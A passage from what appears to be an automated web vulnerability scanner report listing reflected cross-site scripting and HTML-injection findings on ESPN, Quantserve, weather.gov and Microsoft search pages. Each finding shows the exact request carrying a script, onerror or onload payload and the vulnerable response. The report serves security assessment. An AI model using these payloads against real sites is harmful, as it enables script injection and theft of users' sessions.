Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Melo will wear No.
...[SNIP]...
<a href="/blog/new-yorkknicks/post/_/f3622"><script>alert(1)</script>a8a4b6f11a1=1/id/2851/sort/oldest/melo-will-wear-no-7-for-the-knicks">
...[SNIP]...

3.231. http://espn.go.com/blog/new-yorkjets/post/_/id/4686/rex-tannenbaum-ready-for-prime-time [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /blog/new-yorkjets/post/_/id/4686/rex-tannenbaum-ready-for-prime-time

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2eb1"><script>alert(1)</script>b1d8aa4d5e3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/new-yorkjets/post/_/id/4686/rex-tannenbaum-ready-for-prime-timeb2eb1"><script>alert(1)</script>b1d8aa4d5e3 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:20:50 GMT
Content-Type: text/html;charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:20:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN17
Cache-Expires: Wed, 23 Feb 2011 23:25:50 GMT
InvH: blog-new-yorkjets
Content-Length: 55011
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Rex, Tannenbaum rea
...[SNIP]...
<a href="/blog/new-yorkjets/post/_/rex-tannenbaum-ready-for-prime-timeb2eb1"><script>alert(1)</script>b1d8aa4d5e3/id/4686/sort/oldest">
...[SNIP]...

3.232. http://espn.go.com/blog/new-yorkjets/post/_/id/4686/rex-tannenbaum-ready-for-prime-time [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /blog/new-yorkjets/post/_/id/4686/rex-tannenbaum-ready-for-prime-time

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f156"><script>alert(1)</script>4a93f5fb5e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/new-yorkjets/post/_/id/4686/rex-tannenbaum-ready-for-prime-time?1f156"><script>alert(1)</script>4a93f5fb5e8=1 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:19:58 GMT
Content-Type: text/html;charset=iso-8859-1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Wed, 23 Feb 2011 23:24:58 GMT
InvH: blog-new-yorkjets
Content-Length: 54453
Cache-Control: no-cache
Pragma: no-cache
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Rex, Tannenbaum rea
...[SNIP]...
<a href="/blog/new-yorkjets/post/_/id/4686/1f156"><script>alert(1)</script>4a93f5fb5e8=1/sort/oldest/rex-tannenbaum-ready-for-prime-time">
...[SNIP]...

3.233. http://espn.go.com/espn/rss/newyork/news [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://espn.go.com
Path:   /espn/rss/newyork/news

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 993b0<a>c8de8f03e79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /espn/rss/newyork/news?993b0<a>c8de8f03e79=1 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=15
Date: Wed, 23 Feb 2011 23:20:52 GMT
Content-Type: text/xml; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:20:52 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Wed, 23 Feb 2011 23:36:07 GMT
Content-Length: 14917
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet href="http://sports.espn.go.com/rss/friendlyRSSDemo.xsl" type="text/xsl" media="screen"?>
<rss version="2.0"    xmlns:dc="http://purl.org/dc/eleme
...[SNIP]...
<atom:link rel="self" href="http://sports.espn.go.com/espn/rss/newyork/news?993b0<a>c8de8f03e79=1" />
...[SNIP]...

3.234. http://espn.go.com/ncb/conversation [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /ncb/conversation

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f99b1"><script>alert(1)</script>c51c4c595ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ncb/conversation?gameId=310542599&f99b1"><script>alert(1)</script>c51c4c595ec=1 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5
Date: Wed, 23 Feb 2011 23:22:00 GMT
Content-Type: text/html
Last-Modified: Wed, 23 Feb 2011 23:22:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN09
Cache-Expires: Wed, 23 Feb 2011 23:22:05 GMT
Content-Length: 45097
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="?gameId=310542599&amp;f99b1"><script>alert(1)</script>c51c4c595ec=1&amp;sort=oldest">
...[SNIP]...

3.235. http://espn.go.com/new-york/columns/archive [name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /new-york/columns/archive

Issue detail

The value of the name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0db4"><script>alert(1)</script>35d0e784658 was submitted in the name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york/columns/archive?name=ian-o-connorf0db4"><script>alert(1)</script>35d0e784658 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Wed, 23 Feb 2011 23:13:42 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:13:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN03
Cache-Expires: Wed, 23 Feb 2011 23:14:42 GMT
Content-Length: 21570
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Ian O'Connor Archiv
...[SNIP]...
<a href="http://search.espn.go.com/ian-o-connorf0db4"><script>alert(1)</script>35d0e784658/">
...[SNIP]...

3.236. http://espn.go.com/videohub/mpf/config.prodXml [adminOver parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /videohub/mpf/config.prodXml

Issue detail

The value of the adminOver request parameter is copied into the XML document as plain text between tags. The payload ea180<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>6674f816b2 was submitted in the adminOver parameter. This input was echoed as ea180<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>6674f816b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /videohub/mpf/config.prodXml?player=index09&adminOver=3805638ea180<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>6674f816b2&xhr=1 HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Referer: http://espn.go.com/new-york/
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; userAB=F; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1298497363; broadbandAccess=espn3-false%2Cnetworks-false

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 21:43:51 GMT
Content-Type: text/xml;charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 21:43:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN34
Cache-Expires: Wed, 23 Feb 2011 21:52:11 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 6404


<mpf>


   <globalPlayerConfig adminOver="3805638ea180<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>6674f816b2">

       <freewheel>
           <debugMode>QUIET</debugMode>
           <networkID
...[SNIP]...

3.237. http://flash.quantserve.com/quant.swf [lc parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://flash.quantserve.com
Path:   /quant.swf

Issue detail

The value of the lc request parameter is copied into the HTML document as plain text between tags. The payload 37405<a%20b%3dc>7b26340890c was submitted in the lc parameter. This input was echoed as 37405<a b=c>7b26340890c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quant.swf?qcv=2%2E1%2E1&url=http%3A%2F%2Fstatic%2Eslidesharecdn%2Ecom%2Fswf%2Fssplayer2%2Eswf%3Fdoc%3D3%2Draylyle%2Dviglinkforumconppt%2D1%2D110218170233%2Dphpapp01%26stripped%5Ftitle%3D3%2Dray%2Dlyleviglink%2Dforumcon%2Dppt1%26userName%3DVigLink&pageURL=http%3A%2F%2Fblog%2Eviglink%2Ecom%2F&stripped%5Ftitle=3%2Dray%2Dlyleviglink%2Dforumcon%2Dppt1&doc=3%2Draylyle%2Dviglinkforumconppt%2D1%2D110218170233%2Dphpapp01&flashPlayer=WIN%2010%2C2%2C154%2C27&fpf=1%2D0%2D0&userName=VigLink&media=widget&server=http%3A%2F%2Fflash%2Equantserve%2Ecom&lc=%5F1303238625614%5F138037405<a%20b%3dc>7b26340890c&videoId=embed%5Fplayer%5Fas3&publisherId=p%2DabU44ONrAuwk2 HTTP/1.1
Host: flash.quantserve.com
Proxy-Connection: keep-alive
Referer: http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=3-raylyle-viglinkforumconppt-1-110218170233-phpapp01&stripped_title=3-ray-lyleviglink-forumcon-ppt1&userName=VigLink
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EEgBCQHGBpEA

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: application/x-shockwave-flash
Cache-Control: private, no-transform, max-age=86400
Expires: Wed, 20 Apr 2011 18:43:51 GMT
Date: Tue, 19 Apr 2011 18:43:51 GMT
Server: QS
Content-Length: 4698

FWS.Z...x.._.........D.....C....?.0....X.n.setTrace.dothetrace.allowTrace.read_so._depth.setUpLocal_lc.remote_lc.LocalConnection.LOCAL_LCNAME.rpcResult.REMOTE_LCNAME.send.local_lc.allowDomain.allowIns
...[SNIP]...
ject not saved..quant Shared object flushed to disk..quant Shared object could not be flushed to disk..write_so.idToSecs.-.indexOf.slice.parseInt.Math.floor.Date.getTime..join.1-0-0._1303238625614_138037405<a b=c>7b26340890c.nothetrace.3.0.0.this.logs.initialize....initialize....)..............I............................=..    ..........O..............=................@...................    .
.................R....setUpLoc
...[SNIP]...

3.238. http://forecast.weather.gov/product.php [highlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forecast.weather.gov
Path:   /product.php

Issue detail

The value of the highlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b77c1"%20a%3db%20111d93b24a1 was submitted in the highlight parameter. This input was echoed as b77c1" a=b 111d93b24a1 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /product.php?site=NWS&issuedby=GYX&product=AFD&format=CI&version=1&glossary=1&highlight=offb77c1"%20a%3db%20111d93b24a1 HTTP/1.1
Host: forecast.weather.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Age: 8
Date: Sat, 26 Feb 2011 02:11:18 GMT
Content-Length: 23466
Content-Type: text/html; charset=UTF-8
Expires: Sat, 26 Feb 2011 02:26:18 GMT
Cache-Control: max-age=900
X-Pad: work around browser bug
Server: Apache
Via: 1.1 wwwcache-2 (NetCache NetApp/6.0.7), 1.0 c3.w3.woc (squid)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<a href="?site=NWS&issuedby=GYX&product=AFD&format=CI&version=2&glossary=1&highlight=offb77c1" a=b 111d93b24a1">
...[SNIP]...

3.239. http://games.espn.go.com/frontpage/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.espn.go.com
Path:   /frontpage/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e3539<script>alert(1)</script>45440a8342f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /frontpagee3539<script>alert(1)</script>45440a8342f/ HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 132
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/frontpagee3539<script>alert(1)</script>45440a8342f/</BODY></HTML>

3.240. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i1.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2fdba<img%20src%3da%20onerror%3dalert(1)>5c1efd4d1b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2fdba<img src=a onerror=alert(1)>5c1efd4d1b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=TechNet&loc=en-us&watermark=TechNet&focusOnInit=false&2fdba<img%20src%3da%20onerror%3dalert(1)>5c1efd4d1b5=1 HTTP/1.1
Host: i1.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/security/cc308589
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303123822031:ss=1303123822031; WT_NVR_RU=0=technet:1=:2=

Response

HTTP/1.1 200 OK
ntCoent-Length: 12915
Content-Type: application/x-javascript
ETag: a052e59c4d086e3c6c172276d3240c78
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB38
Content-Length: 12915
Cache-Control: public, max-age=43199
Expires: Tue, 19 Apr 2011 23:23:20 GMT
Date: Tue, 19 Apr 2011 11:23:21 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
archBox({"allowEmptySearch":false,"appId":"2","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&2fdba<img src=a onerror=alert(1)>5c1efd4d1b5=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...

3.241. http://i2.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i2.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e5baa<img%20src%3da%20onerror%3dalert(1)>d5054e4a430 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5baa<img src=a onerror=alert(1)>d5054e4a430 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=TechNet&loc=en-us&watermark=TechNet&focusOnInit=false&e5baa<img%20src%3da%20onerror%3dalert(1)>d5054e4a430=1 HTTP/1.1
Host: i2.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/security/cc308589
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; WT_NVR_RU=0=technet:1=:2=; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303201439308:ss=1303201412112

Response

HTTP/1.1 200 OK
ntCoent-Length: 12915
Content-Type: application/x-javascript
ETag: 4d9f632865803e5dd9d411f4605adee2
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB32
Content-Length: 12915
Cache-Control: public, max-age=43200
Expires: Tue, 19 Apr 2011 23:23:50 GMT
Date: Tue, 19 Apr 2011 11:23:50 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
archBox({"allowEmptySearch":false,"appId":"2","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&e5baa<img src=a onerror=alert(1)>d5054e4a430=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...

3.242. http://i3.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i3.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

